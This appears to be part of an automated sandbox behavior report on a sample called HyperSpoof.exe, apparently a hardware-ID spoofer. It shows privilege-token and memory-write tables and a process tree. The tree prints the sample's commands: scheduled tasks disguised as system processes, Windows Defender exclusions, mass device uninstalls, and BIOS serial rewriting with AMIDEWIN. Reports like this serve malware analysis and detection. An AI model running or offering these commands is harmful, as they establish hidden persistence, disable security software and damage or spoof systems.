N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeLoadDriverPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeLoadDriverPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeLoadDriverPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeLoadDriverPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1688 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1688 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1688 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1932 wrote to memory of 1608 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
PID 1932 wrote to memory of 1608 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
PID 1932 wrote to memory of 1608 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
PID 1932 wrote to memory of 2592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe
PID 1932 wrote to memory of 2592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe
PID 1932 wrote to memory of 2592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe
PID 1932 wrote to memory of 2592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe
PID 1932 wrote to memory of 2220 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\conhostsft.exe
PID 1932 wrote to memory of 2220 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\conhostsft.exe
PID 1932 wrote to memory of 2220 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\conhostsft.exe
PID 1932 wrote to memory of 2220 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\conhostsft.exe
PID 1608 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\System32\cmd.exe
PID 1608 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\System32\cmd.exe
PID 1608 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\System32\cmd.exe
PID 1652 wrote to memory of 2236 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\Volumeid64.exe
PID 1652 wrote to memory of 2236 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\Volumeid64.exe
PID 1652 wrote to memory of 2236 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\Volumeid64.exe
PID 2592 wrote to memory of 584 N/A C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe C:\Windows\SysWOW64\WScript.exe
PID 2592 wrote to memory of 584 N/A C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe C:\Windows\SysWOW64\WScript.exe
PID 2592 wrote to memory of 584 N/A C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe C:\Windows\SysWOW64\WScript.exe
PID 2592 wrote to memory of 584 N/A C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe C:\Windows\SysWOW64\WScript.exe
PID 2220 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Roaming\conhostsft.exe C:\Users\Admin\AppData\Roaming\.conhostsft.exe
PID 2220 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Roaming\conhostsft.exe C:\Users\Admin\AppData\Roaming\.conhostsft.exe
PID 2220 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Roaming\conhostsft.exe C:\Users\Admin\AppData\Roaming\.conhostsft.exe
PID 2220 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Roaming\conhostsft.exe C:\Users\Admin\AppData\Roaming\.conhostsft.exe
PID 1608 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\System32\cmd.exe
PID 1608 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\System32\cmd.exe
PID 1608 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\System32\cmd.exe
PID 1284 wrote to memory of 2368 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2368 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2368 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2956 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2956 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2956 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2268 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2268 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2268 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2276 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2276 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2276 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 1684 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 1684 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 1684 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2892 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2892 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2892 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2320 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2320 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2320 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 576 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 576 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 576 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 572 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 572 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 572 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 3028 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 3028 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 3028 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2836 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2836 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2836 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe

"C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"

C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe

"C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"

C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe

"C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe"

C:\Users\Admin\AppData\Roaming\conhostsft.exe

"C:\Users\Admin\AppData\Roaming\conhostsft.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 570Z-GGZB

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 570Z-GGZB

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\ChainReview\4N7V2tIOe7KSQ8eET3YGuCyK2Y.vbe"

C:\Users\Admin\AppData\Roaming\.conhostsft.exe

"C:\Users\Admin\AppData\Roaming\.conhostsft.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\ChainReview\8xoM57ln5l3nWVEqwKA0TDOQ0Am35EOuQMtKP.bat" "

C:\ChainReview\sphyperRuntimedhcpSvc.exe

"C:\ChainReview/sphyperRuntimedhcpSvc.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 13721HP-TRGT24587AB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Videos\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\Default\Videos\explorer.exe'" /rl HIGHEST /f

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 213724HP-TRGT2567RV

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Videos\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender\fr-FR\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\fr-FR\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Defender\fr-FR\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 11 /tr "'C:\ChainReview\taskhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\ChainReview\taskhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 6 /tr "'C:\ChainReview\taskhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "DevManViewD" /sc MINUTE /mo 13 /tr "'C:\ChainReview\DevManView.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "DevManView" /sc ONLOGON /tr "'C:\ChainReview\DevManView.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "DevManViewD" /sc MINUTE /mo 7 /tr "'C:\ChainReview\DevManView.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Videos\explorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\fr-FR\lsass.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainReview\taskhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainReview\DevManView.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 813724HP-TRGT2567SG

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 513724HP-TRGT2567SL

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 413724HP-TRGT2567FA

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 613724HP-TRGT2567FU

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 313724HP-TRGT2567DQ

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 713724HP-TRGT2567MST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\4ZoQI0Qg2k.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\Windows\System32\cmd.exe

